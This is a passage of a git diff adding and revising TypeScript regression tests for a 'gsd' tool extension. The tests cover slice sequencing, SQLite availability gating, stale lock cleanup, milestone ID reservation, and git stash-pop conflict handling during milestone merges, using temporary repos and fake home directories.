+    const source = readFileSync(join(gsdDir, "preferences-types.ts"), "utf-8");
+    assert.ok(
+      source.includes("slice_parallel"),
+      "GSDPreferences should have slice_parallel field",
+    );
+  });
+
+  it("slice_parallel is in KNOWN_PREFERENCE_KEYS", () => {
+    const source = readFileSync(join(gsdDir, "preferences-types.ts"), "utf-8");
+    assert.ok(
+      source.includes('"slice_parallel"'),
+      'KNOWN_PREFERENCE_KEYS should include "slice_parallel"',
+    );
+  });
+
+  it("state.ts checks GSD_SLICE_LOCK for slice isolation", () => {
+    const source = readFileSync(join(gsdDir, "state.ts"), "utf-8");
+    assert.ok(
+      source.includes("GSD_SLICE_LOCK"),
+      "State derivation should check GSD_SLICE_LOCK for slice-level parallel isolation",
+    );
+  });
+
+  it("auto.ts imports slice parallel orchestrator when enabled", () => {
+    const source = readFileSync(join(gsdDir, "auto.ts"), "utf-8");
+    assert.ok(
+      source.includes("slice_parallel") || source.includes("slice-parallel"),
+      "auto.ts should reference slice_parallel for dispatch gating",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/slice-sequence-insert.test.ts b/src/resources/extensions/gsd/tests/slice-sequence-insert.test.ts
new file mode 100644
index 000000000..e041811aa
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/slice-sequence-insert.test.ts
@@ -0,0 +1,51 @@
+/**
+ * Regression test for #3697 — set slice sequence on insert
+ *
+ * All three insertSlice call sites must pass a sequence value so slices
+ * are ordered correctly instead of defaulting to 0.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const planMilestoneSrc = readFileSync(
+  join(__dirname, '..', 'tools', 'plan-milestone.ts'),
+  'utf-8',
+);
+const reassessRoadmapSrc = readFileSync(
+  join(__dirname, '..', 'tools', 'reassess-roadmap.ts'),
+  'utf-8',
+);
+const mdImporterSrc = readFileSync(
+  join(__dirname, '..', 'md-importer.ts'),
+  'utf-8',
+);
+
+describe('slice sequence on insert (#3697)', () => {
+  test('plan-milestone.ts passes sequence to insertSlice', () => {
+    assert.match(planMilestoneSrc, /insertSlice\(/,
+      'plan-milestone.ts should call insertSlice');
+    assert.match(planMilestoneSrc, /sequence:\s*i\s*\+\s*1/,
+      'plan-milestone.ts should pass sequence: i + 1');
+  });
+
+  test('reassess-roadmap.ts passes sequence to insertSlice', () => {
+    assert.match(reassessRoadmapSrc, /insertSlice\(/,
+      'reassess-roadmap.ts should call insertSlice');
+    assert.match(reassessRoadmapSrc, /sequence:\s*existingCount\s*\+\s*i\s*\+\s*1/,
+      'reassess-roadmap.ts should pass sequence: existingCount + i + 1');
+  });
+
+  test('md-importer.ts passes sequence to insertSlice', () => {
+    assert.match(mdImporterSrc, /insertSlice\(/,
+      'md-importer.ts should call insertSlice');
+    assert.match(mdImporterSrc, /sequence:\s*si\s*\+\s*1/,
+      'md-importer.ts should pass sequence: si + 1');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/smart-entry-complete.test.ts b/src/resources/extensions/gsd/tests/smart-entry-complete.test.ts
index 6abb0e8e6..14a111479 100644
--- a/src/resources/extensions/gsd/tests/smart-entry-complete.test.ts
+++ b/src/resources/extensions/gsd/tests/smart-entry-complete.test.ts
@@ -6,7 +6,7 @@ import { tmpdir } from "node:os";
 
 const { deriveState } = await import("../state.js");
 
-test("deriveState reports complete when all milestone slices are done", async () => {
+test("deriveState reports the last completed milestone when all milestone slices are done", async () => {
   const base = mkdtempSync(join(tmpdir(), "gsd-smart-entry-complete-"));
 
   try {
@@ -31,7 +31,7 @@ test("deriveState reports complete when all milestone slices are done", async ()
 
     const state = await deriveState(base);
     assert.equal(state.phase, "complete");
-    assert.equal(state.activeMilestone?.id, "M001");
+    assert.equal(state.lastCompletedMilestone?.id, "M001");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
@@ -49,5 +49,5 @@ test("guided-flow complete branch offers a chooser for next milestone or status"
   assert.match(branchChunk, /showNextAction\(/, "complete branch should present a chooser");
   assert.match(branchChunk, /findMilestoneIds\(basePath\)/, "complete branch should compute the next milestone id");
   assert.match(branchChunk, /nextMilestoneId(?:Reserved)?\(milestoneIds, uniqueMilestoneIds\)/, "complete branch should derive the next milestone id");
-  assert.match(branchChunk, /dispatchWorkflow\(pi, buildDiscussPrompt\(/, "complete branch should dispatch the discuss prompt");
+  assert.match(branchChunk, /dispatchWorkflow\(pi, await prepareAndBuildDiscussPrompt\(/, "complete branch should dispatch the prepared discuss prompt");
 });
diff --git a/src/resources/extensions/gsd/tests/sqlite-unavailable-gate.test.ts b/src/resources/extensions/gsd/tests/sqlite-unavailable-gate.test.ts
new file mode 100644
index 000000000..62d89b0d3
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/sqlite-unavailable-gate.test.ts
@@ -0,0 +1,65 @@
+/**
+ * sqlite-unavailable-gate.test.ts — #2419
+ *
+ * When the SQLite provider fails to open, bootstrapAutoSession must
+ * refuse to start auto-mode. Otherwise gsd_task_complete returns
+ * "db_unavailable", artifact retry re-dispatches the same task, and
+ * the session loops forever.
+ *
+ * This test verifies the gate by reading auto-start.ts source and
+ * confirming the pattern: after the DB lifecycle block, if the DB
+ * file exists on disk but isDbAvailable() still returns false after
+ * the open attempt, bootstrap must abort with an error notification.
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const srcPath = join(import.meta.dirname, "..", "auto-start.ts");
+const src = readFileSync(srcPath, "utf-8");
+
+console.log("\n=== #2419: SQLite unavailable gate in auto-start.ts ===");
+
+// The DB lifecycle section tries to open the DB. After those try/catch
+// blocks, there must be a HARD GATE: if the DB file exists on disk but
+// isDbAvailable() is still false (open failed), bootstrap must abort
+// by calling releaseLockAndReturn() with an error notification.
+
+const dbLifecycleIdx = src.indexOf("DB lifecycle");
+assertTrue(dbLifecycleIdx > 0, "auto-start.ts has a DB lifecycle section");
+
+const afterDbLifecycle = src.slice(dbLifecycleIdx);
+
+// The DB lifecycle section may contain multiple isDbAvailable() checks now that
+// cold-start bootstrap can pre-open the DB earlier in the file. What matters
+// for #2419 is the explicit abort gate after the DB open attempts.
+assertTrue(
+  afterDbLifecycle.includes("!isDbAvailable()"),
+  "DB lifecycle section still checks for unavailable DB state (#2419)",
+);
+
+const gateMatch = afterDbLifecycle.match(
+  /if\s*\(existsSync\(gsdDbPath\)\s*&&\s*!isDbAvailable\(\)\)\s*\{[\s\S]*?releaseLockAndReturn\(\);[\s\S]*?\}/,
+);
+
+assertTrue(
+  !!gateMatch,
+  "auto-start.ts has a hard abort gate when gsd.db exists but SQLite is still unavailable (#2419)",
+);
+
+if (gateMatch) {
+  const gateRegion = gateMatch[0];
+  assertTrue(
+    gateRegion.includes("releaseLockAndReturn"),
+    "The DB availability gate calls releaseLockAndReturn() to abort bootstrap (#2419)",
+  );
+  assertTrue(
+    /database|sqlite|db.*unavailable/i.test(gateRegion),
+    "The DB availability gate includes a user-facing error message about the database (#2419)",
+  );
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/stale-lockfile-recovery.test.ts b/src/resources/extensions/gsd/tests/stale-lockfile-recovery.test.ts
new file mode 100644
index 000000000..c7a4ab2ab
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stale-lockfile-recovery.test.ts
@@ -0,0 +1,36 @@
+/**
+ * stale-lockfile-recovery.test.ts — #3668
+ *
+ * Verify that session-lock.ts contains pre-flight stale lock cleanup logic
+ * that removes orphaned lock directories when the owning PID is dead,
+ * preventing the 30-min stale window from blocking /gsd after crashes.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const sourceFile = join(__dirname, "..", "session-lock.ts");
+
+describe("stale lockfile auto-recovery (#3668)", () => {
+  const source = readFileSync(sourceFile, "utf-8");
+
+  test("checks for orphan lock with isPidAlive", () => {
+    assert.match(source, /isPidAlive\(existingData\.pid\)/);
+  });
+
+  test("removes stale lock directory with rmSync", () => {
+    assert.match(source, /rmSync\(lockDir,\s*\{\s*recursive:\s*true/);
+  });
+
+  test("references issue #3218 in pre-flight cleanup comment", () => {
+    assert.match(source, /#3218.*Pre-flight stale lock cleanup/);
+  });
+
+  test("provides actionable rm -rf workaround in error message", () => {
+    assert.match(source, /rm\s+-rf/);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/stale-milestone-id-reservation.test.ts b/src/resources/extensions/gsd/tests/stale-milestone-id-reservation.test.ts
new file mode 100644
index 000000000..cfcfbef1a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stale-milestone-id-reservation.test.ts
@@ -0,0 +1,79 @@
+/**
+ * Regression test for #2488: Stale milestone ID reservations inflate next ID
+ * after cancelled /gsd sessions.
+ *
+ * The module-level `reservedMilestoneIds` Set persists across /gsd invocations
+ * within the same Node process. Without clearReservedMilestoneIds() at session
+ * start, each cancelled session permanently bumps the counter by 1.
+ */
+import { describe, test, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+
+import {
+  nextMilestoneId,
+  reserveMilestoneId,
+  getReservedMilestoneIds,
+  clearReservedMilestoneIds,
+} from "../milestone-ids.ts";
+
+describe("stale milestone ID reservation cleanup (#2488)", () => {
+  beforeEach(() => {
+    clearReservedMilestoneIds();
+  });
+
+  test("without cleanup, cancelled sessions inflate the next ID", () => {
+    const diskIds = ["M001", "M002", "M003"];
+
+    // Session 1: user starts /gsd, ID is previewed and reserved, then cancelled
+    const allIds1 = [...new Set([...diskIds, ...getReservedMilestoneIds()])];
+    const preview1 = nextMilestoneId(allIds1);
+    reserveMilestoneId(preview1);
+    assert.equal(preview1, "M004");
+
+    // Session 2: user starts /gsd again — stale reservation still in Set
+    // WITHOUT clearing, the next ID skips M004 (reserved) and goes to M005
+    const allIds2 = [...new Set([...diskIds, ...getReservedMilestoneIds()])];
+    const preview2 = nextMilestoneId(allIds2);
+    assert.equal(preview2, "M005", "without cleanup, ID inflates to M005");
+  });
+
+  test("with cleanup at session start, next ID is correct", () => {
+    const diskIds = ["M001", "M002", "M003"];
+
+    // Session 1: user starts /gsd, ID is previewed and reserved, then cancelled
+    const allIds1 = [...new Set([...diskIds, ...getReservedMilestoneIds()])];
+    const preview1 = nextMilestoneId(allIds1);
+    reserveMilestoneId(preview1);
+    assert.equal(preview1, "M004");
+
+    // Session 2: clear stale reservations first (the fix)
+    clearReservedMilestoneIds();
+
+    // Now the next ID correctly returns M004 again
+    const allIds2 = [...new Set([...diskIds, ...getReservedMilestoneIds()])];
+    const preview2 = nextMilestoneId(allIds2);
+    assert.equal(preview2, "M004", "after cleanup, ID is correctly M004");
+  });
+
+  test("multiple cancelled sessions compound the inflation without cleanup", () => {
+    const diskIds = ["M001", "M002", "M003"];
+
+    // 3 cancelled sessions without cleanup
+    for (let i = 0; i < 3; i++) {
+      const allIds = [...new Set([...diskIds, ...getReservedMilestoneIds()])];
+      const preview = nextMilestoneId(allIds);
+      reserveMilestoneId(preview);
+    }
+
+    // Without cleanup, we're now at M007 instead of M004
+    const allIds = [...new Set([...diskIds, ...getReservedMilestoneIds()])];
+    const next = nextMilestoneId(allIds);
+    assert.equal(next, "M007", "3 cancelled sessions inflate ID by 3");
+
+    // With cleanup, we're back to M004
+    clearReservedMilestoneIds();
+    const allIdsClean = [...new Set([...diskIds, ...getReservedMilestoneIds()])];
+    const nextClean = nextMilestoneId(allIdsClean);
+    assert.equal(nextClean, "M004", "cleanup restores correct next ID");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/stale-queued-milestone.test.ts b/src/resources/extensions/gsd/tests/stale-queued-milestone.test.ts
new file mode 100644
index 000000000..5d99b961e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stale-queued-milestone.test.ts
@@ -0,0 +1,147 @@
+/**
+ * Regression test for #3470: DB-backed active milestone selection must not
+ * prefer a stale queued shell over the real active milestone.
+ *
+ * Scenario: M068 is a queued placeholder (DB row, no files, no slices).
+ * M070 is the real active milestone (context, roadmap, slices, tasks).
+ * deriveStateFromDb() must select M070 as active, not M068.
+ */
+
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { deriveStateFromDb, invalidateStateCache } from "../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+} from "../gsd-db.ts";
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-stale-milestone-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, ".gsd", relativePath);
+  mkdirSync(join(full, ".."), { recursive: true });
+  writeFileSync(full, content);
+}
+
+describe("stale queued milestone selection (#3470)", () => {
+  let base: string;
+
+  afterEach(() => {
+    closeDatabase();
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("queued shell with no content does not block real active milestone", async () => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+
+    // M068: queued shell — DB row exists, no files, no slices
+    insertMilestone({ id: "M068", title: "Queued Shell", status: "queued" });
+
+    // M070: real active milestone — context, roadmap, slices, tasks
+    insertMilestone({ id: "M070", title: "Real Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M070", title: "Slice One", status: "active", risk: "low", depends: [] });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M070", title: "Task One", status: "pending" });
+
+    writeFile(base, "milestones/M070/M070-CONTEXT.md", "# M070: Real Active\n\nThis is the real milestone.");
+    writeFile(base, "milestones/M070/M070-ROADMAP.md", "# M070: Real Active\n\n## Slices\n\n- [ ] **S01: Slice One**");
+    writeFile(base, "milestones/M070/slices/S01/S01-PLAN.md", "# S01: Slice One\n\n## Tasks\n\n- [ ] **T01: Task One**");
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    assert.equal(state.activeMilestone?.id, "M070", "Active milestone must be M070, not queued shell M068");
+
+    // M068 should appear as pending in registry, not active
+    const m068Entry = state.registry.find((e: any) => e.id === "M068");
+    assert.ok(m068Entry, "M068 should still appear in registry");
+    assert.equal(m068Entry!.status, "pending", "M068 should be pending, not active");
+
+    // M070 should be active in registry
+    const m070Entry = state.registry.find((e: any) => e.id === "M070");
+    assert.ok(m070Entry, "M070 should appear in registry");
+    assert.equal(m070Entry!.status, "active", "M070 should be active in registry");
+  });
+
+  test("queued milestone WITH context file can still be selected as active", async () => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+
+    // M068: queued but has context (discussion started) — should be activatable
+    insertMilestone({ id: "M068", title: "Queued With Context", status: "queued" });
+    writeFile(base, "milestones/M068/M068-CONTEXT.md", "# M068: Queued With Context\n\nDiscussion started.");
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    assert.equal(state.activeMilestone?.id, "M068", "Queued milestone with context should become active");
+  });
+
+  test("queued milestone WITH context-draft can still be selected as active", async () => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+
+    // M068: queued but has draft (discussion in progress)
+    insertMilestone({ id: "M068", title: "Queued With Draft", status: "queued" });
+    writeFile(base, "milestones/M068/M068-CONTEXT-DRAFT.md", "# M068: Queued With Draft\n\nDraft in progress.");
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    assert.equal(state.activeMilestone?.id, "M068", "Queued milestone with draft should become active");
+  });
+
+  test("queued milestone WITH slices can still be selected as active", async () => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+
+    // M068: queued but has slices (planning started)
+    insertMilestone({ id: "M068", title: "Queued With Slices", status: "queued" });
+    insertSlice({ id: "S01", milestoneId: "M068", title: "Slice One", status: "pending", risk: "low", depends: [] });
+    writeFile(base, "milestones/M068/M068-ROADMAP.md", "# M068\n\n## Slices\n\n- [ ] **S01: Slice One**");
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    assert.equal(state.activeMilestone?.id, "M068", "Queued milestone with slices should become active");
+  });
+
+  test("multiple queued shells all skipped in favor of real active", async () => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+
+    // Three queued shells before the real milestone
+    insertMilestone({ id: "M065", title: "Shell 1", status: "queued" });
+    insertMilestone({ id: "M066", title: "Shell 2", status: "queued" });
+    insertMilestone({ id: "M068", title: "Shell 3", status: "queued" });
+
+    // M070: real active
+    insertMilestone({ id: "M070", title: "Real Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M070", title: "Slice One", status: "active", risk: "low", depends: [] });
+    writeFile(base, "milestones/M070/M070-CONTEXT.md", "# M070: Real Active");
+    writeFile(base, "milestones/M070/M070-ROADMAP.md", "# M070\n\n## Slices\n\n- [ ] **S01: Slice One**");
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    assert.equal(state.activeMilestone?.id, "M070", "Must skip all queued shells to reach M070");
+
+    // All shells should be pending
+    for (const id of ["M065", "M066", "M068"]) {
+      const entry = state.registry.find((e: any) => e.id === id);
+      assert.ok(entry, `${id} should be in registry`);
+      assert.equal(entry!.status, "pending", `${id} should be pending, not active`);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/stale-worktree-cwd.test.ts b/src/resources/extensions/gsd/tests/stale-worktree-cwd.test.ts
index 163b0a804..def9d7107 100644
--- a/src/resources/extensions/gsd/tests/stale-worktree-cwd.test.ts
+++ b/src/resources/extensions/gsd/tests/stale-worktree-cwd.test.ts
@@ -17,6 +17,8 @@ import {
   teardownAutoWorktree,
   mergeMilestoneToMain,
 } from "../auto-worktree.ts";
+import { _resetServiceCache } from "../worktree.ts";
+import { _clearGsdRootCache } from "../paths.ts";
 
 function run(command: string, cwd: string): string {
   return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
@@ -62,6 +64,13 @@ test("mergeMilestoneToMain restores cwd to project root", () => {
   const savedCwd = process.cwd();
   let tempDir = "";
 
+  // Isolate from user's global preferences (which may have git.main_branch set)
+  const originalHome = process.env.HOME;
+  const fakeHome = realpathSync(mkdtempSync(join(tmpdir(), "gsd-fake-home-")));
+  process.env.HOME = fakeHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+
   try {
     tempDir = createTempRepo();
 
@@ -97,9 +106,13 @@ test("mergeMilestoneToMain restores cwd to project root", () => {
     assert.ok(!existsSync(wtPath), "worktree directory removed after merge");
   } finally {
     process.chdir(savedCwd);
+    process.env.HOME = originalHome;
+    _clearGsdRootCache();
+    _resetServiceCache();
     if (tempDir && existsSync(tempDir)) {
       rmSync(tempDir, { recursive: true, force: true });
     }
+    rmSync(fakeHome, { recursive: true, force: true });
   }
 });
 
diff --git a/src/resources/extensions/gsd/tests/stalled-tool-recovery.test.ts b/src/resources/extensions/gsd/tests/stalled-tool-recovery.test.ts
index 7d46c1128..bbdaa68ad 100644
--- a/src/resources/extensions/gsd/tests/stalled-tool-recovery.test.ts
+++ b/src/resources/extensions/gsd/tests/stalled-tool-recovery.test.ts
@@ -19,9 +19,9 @@ import { mkdtempSync, mkdirSync, rmSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { recoverTimedOutUnit, type RecoveryContext } from "../auto-timeout-recovery.ts";
-import { createTestContext } from './test-helpers.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertTrue, report } = createTestContext();
 
 // Minimal mock for ExtensionContext — only the fields recoverTimedOutUnit touches.
 function makeMockCtx() {
@@ -55,12 +55,12 @@ function makeMockPi() {
     await recoverTimedOutUnit(ctx, pi, "execute-task", "M001/S01/T01", "idle", emptyRctx);
   } catch (err: any) {
     crashed = true;
-    assertTrue(
+    assert.ok(
       err.message.includes("path") || err.message.includes("string") || err.code === "ERR_INVALID_ARG_TYPE",
       `should crash with path/type error, got: ${err.message}`,
     );
   }
-  assertTrue(crashed, "should crash when basePath is undefined (reproduces #1855)");
+  assert.ok(crashed, "should crash when basePath is undefined (reproduces #1855)");
 }
 
 // ═══ #1855: valid RecoveryContext does not crash ═════════════════════════════
@@ -90,13 +90,11 @@ function makeMockPi() {
       crashed = true;
       console.error(`  Unexpected crash: ${err.message}`);
     }
-    assertTrue(!crashed, "should not crash with valid basePath");
+    assert.ok(!crashed, "should not crash with valid basePath");
     // With no runtime record on disk and recoveryAttempts=0, the function
     // should attempt steering recovery (sendMessage) and return "recovered".
-    assertTrue(result === "recovered", `should return 'recovered', got '${result}'`);
+    assert.ok(result === "recovered", `should return 'recovered', got '${result}'`);
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
 }
-
-report();
diff --git a/src/resources/extensions/gsd/tests/stash-pop-gsd-conflict.test.ts b/src/resources/extensions/gsd/tests/stash-pop-gsd-conflict.test.ts
new file mode 100644
index 000000000..f295c8f0f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stash-pop-gsd-conflict.test.ts
@@ -0,0 +1,146 @@
+/**
+ * stash-pop-gsd-conflict.test.ts — Regression test for #2766.
+ *
+ * When a squash merge stash-pops and hits conflicts on .gsd/ state files,
+ * the UU entries block every subsequent merge. This test verifies that
+ * mergeMilestoneToMain auto-resolves .gsd/ conflicts by accepting HEAD
+ * and drops the stash, leaving the repo in a clean state.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, readFileSync, realpathSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import { createAutoWorktree, mergeMilestoneToMain } from "../auto-worktree.ts";
+import { _resetServiceCache } from "../worktree.ts";
+import { _clearGsdRootCache } from "../paths.ts";
+
+// Isolate from user's global preferences (which may have git.main_branch set)
+let originalHome: string | undefined;
+let fakeHome: string;
+
+test.before(() => {
+  originalHome = process.env.HOME;
+  fakeHome = realpathSync(mkdtempSync(join(tmpdir(), "gsd-fake-home-")));
+  process.env.HOME = fakeHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+});
+
+test.after(() => {
+  process.env.HOME = originalHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+  rmSync(fakeHome, { recursive: true, force: true });
+});
+
+function run(cmd: string, cwd: string): string {
+  return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function createTempRepo(): string {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-stashpop-test-")));
+  run("git init", dir);
+  run("git config user.email test@test.com", dir);
+  run("git config user.name Test", dir);
+  writeFileSync(join(dir, "README.md"), "# test\n");
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "STATE.md"), "version: 1\n");
+  run("git add .", dir);
+  run("git commit -m init", dir);
+  run("git branch -M main", dir);
+  return dir;
+}
+
+function makeRoadmap(milestoneId: string, title: string, slices: Array<{ id: string; title: string }>): string {
+  const sliceLines = slices.map(s => `- [x] **${s.id}: ${s.title}**`).join("\n");
+  return `# ${milestoneId}: ${title}\n\n## Slices\n${sliceLines}\n`;
+}
+
+test("#2766: stash pop conflict on .gsd/ files is auto-resolved", () => {
+  const repo = createTempRepo();
+  try {
+    const wtPath = createAutoWorktree(repo, "M300");
+
+    // Add a slice with real code on the milestone branch
+    const normalizedPath = wtPath.replaceAll("\\", "/");
+    const worktreeName = normalizedPath.split("/").pop() || "M300";
+    const sliceBranch = `slice/${worktreeName}/S01`;
+    run(`git checkout -b "${sliceBranch}"`, wtPath);
+    writeFileSync(join(wtPath, "feature.ts"), "export const feature = true;\n");
+
+    // Modify .gsd/STATE.md on the milestone branch (diverges from main)
+    writeFileSync(join(wtPath, ".gsd", "STATE.md"), "version: 2-milestone\n");
+    run("git add .", wtPath);
+    run('git commit -m "add feature and update state"', wtPath);
+    run("git checkout milestone/M300", wtPath);
+    run(`git merge --no-ff "${sliceBranch}" -m "merge S01: feature"`, wtPath);
+
+    // Dirty .gsd/STATE.md in the main repo (stash will conflict on pop)
+    writeFileSync(join(repo, ".gsd", "STATE.md"), "version: 2-main-dirty\n");
+
+    const roadmap = makeRoadmap("M300", "Stash pop conflict test", [
+      { id: "S01", title: "Feature" },
+    ]);
+
+    // mergeMilestoneToMain should succeed — .gsd/ conflict auto-resolved
+    const result = mergeMilestoneToMain(repo, "M300", roadmap);
+    assert.ok(
+      result.commitMessage.includes("GSD-Milestone: M300"),
+      "merge succeeds despite stash pop conflict on .gsd/ file",
+    );
+    assert.ok(existsSync(join(repo, "feature.ts")), "milestone code merged to main");
+
+    // Verify repo is clean (no UU entries blocking future merges)
+    const status = run("git status --porcelain", repo);
+    assert.ok(
+      !status.includes("UU "),
+      "no unmerged (UU) entries remain after stash pop conflict resolution",
+    );
+
+    // Stash should be dropped (no remaining stash entries)
+    let stashList = "";
+    try { stashList = run("git stash list", repo); } catch { /* empty stash */ }
+    assert.strictEqual(stashList, "", "stash is empty after .gsd/ conflict auto-resolution");
+  } finally {
+    try { rmSync(repo, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* cleanup best-effort */ }
+  }
+});
+
+test("#2766: stash pop conflict on non-.gsd files preserves stash for manual resolution", () => {
+  const repo = createTempRepo();
+  try {
+    const wtPath = createAutoWorktree(repo, "M301");
+
+    // Add a slice that modifies a file also dirty on main
+    const normalizedPath = wtPath.replaceAll("\\", "/");
+    const worktreeName = normalizedPath.split("/").pop() || "M301";
+    const sliceBranch = `slice/${worktreeName}/S01`;
+    run(`git checkout -b "${sliceBranch}"`, wtPath);
+    writeFileSync(join(wtPath, "README.md"), "# milestone version\n");
+    run("git add .", wtPath);
+    run('git commit -m "update readme"', wtPath);
+    run("git checkout milestone/M301", wtPath);
+    run(`git merge --no-ff "${sliceBranch}" -m "merge S01: readme"`, wtPath);
+
+    // Dirty README.md in the main repo — this will conflict on stash pop
+    // and is NOT a .gsd/ file, so it should be left for manual resolution
+    writeFileSync(join(repo, "README.md"), "# locally modified\n");
+
+    const roadmap = makeRoadmap("M301", "Non-gsd stash conflict", [
+      { id: "S01", title: "Readme update" },
+    ]);
+
+    // The merge itself should still succeed (stash pop conflict is non-fatal)
+    const result = mergeMilestoneToMain(repo, "M301", roadmap);
+    assert.ok(
+      result.commitMessage.includes("GSD-Milestone: M301"),
+      "merge succeeds even with non-.gsd stash pop conflict",
+    );
+  } finally {
+    try { rmSync(repo, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* cleanup best-effort */ }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/stash-queued-context-files.test.ts b/src/resources/extensions/gsd/tests/stash-queued-context-files.test.ts
new file mode 100644
index 000000000..ad4591908
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stash-queued-context-files.test.ts
@@ -0,0 +1,326 @@
+/**
+ * stash-queued-context-files.test.ts — Regression test for #2505.
+ *
+ * When mergeMilestoneToMain runs `git stash push --include-untracked`,
+ * untracked `.gsd/milestones/M<queued>/` directories created by `/gsd queue`
+ * are swept into the stash. If stash pop fails (conflict on tracked files),
+ * the queued milestone CONTEXT files are permanently lost.
+ *
+ * The fix: drop `--include-untracked` from the stash push, since the stash
+ * only needs to handle tracked dirty files. Untracked `.gsd/` files are
+ * already handled separately by clearProjectRootStateFiles.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  rmSync,
+  existsSync,
+  readFileSync,
+  realpathSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import { createAutoWorktree, mergeMilestoneToMain } from "../auto-worktree.ts";
+import { _resetServiceCache } from "../worktree.ts";
+import { _clearGsdRootCache } from "../paths.ts";
+
+// Isolate from user's global preferences (which may have git.main_branch set)
+let originalHome: string | undefined;
+let fakeHome: string;
+
+test.before(() => {
+  originalHome = process.env.HOME;
+  fakeHome = realpathSync(mkdtempSync(join(tmpdir(), "gsd-fake-home-")));
+  process.env.HOME = fakeHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+});
+
+test.after(() => {
+  process.env.HOME = originalHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+  rmSync(fakeHome, { recursive: true, force: true });
+});
+
+function run(cmd: string, cwd: string): string {
+  return execSync(cmd, {
+    cwd,
+    stdio: ["ignore", "pipe", "pipe"],
+    encoding: "utf-8",
+  }).trim();
+}
+
+function createTempRepo(): string {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-ctx-stash-test-")));
+  run("git init", dir);
+  run("git config user.email test@test.com", dir);
+  run("git config user.name Test", dir);
+  writeFileSync(join(dir, "README.md"), "# test\n");
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "STATE.md"), "version: 1\n");
+  // In projects with tracked .gsd/ files (hasGitTrackedGsdFiles=true),
+  // .gsd is NOT added to .gitignore. This means untracked files under
+  // .gsd/ are visible to --include-untracked and get swept into the
+  // stash, destroying queued milestone CONTEXT files (#2505).
+  run("git add -f .gsd/STATE.md", dir);
+  run("git add .", dir);
+  run("git commit -m init", dir);
+  run("git branch -M main", dir);
+  return dir;
+}
+
+function makeRoadmap(
+  milestoneId: string,
+  title: string,
+  slices: Array<{ id: string; title: string }>,
+): string {
+  const sliceLines = slices
